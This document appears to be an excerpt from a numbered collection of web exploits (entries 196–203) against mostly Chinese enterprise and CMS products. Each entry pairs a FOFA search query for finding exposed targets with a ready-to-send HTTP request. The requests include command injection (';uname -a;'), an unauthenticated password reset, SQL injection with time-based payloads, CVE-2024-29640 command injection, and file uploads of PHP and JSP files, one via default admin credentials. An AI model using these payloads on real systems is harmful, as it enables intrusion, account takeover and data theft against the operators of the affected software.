POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (FOUNDER) omni-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt
203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--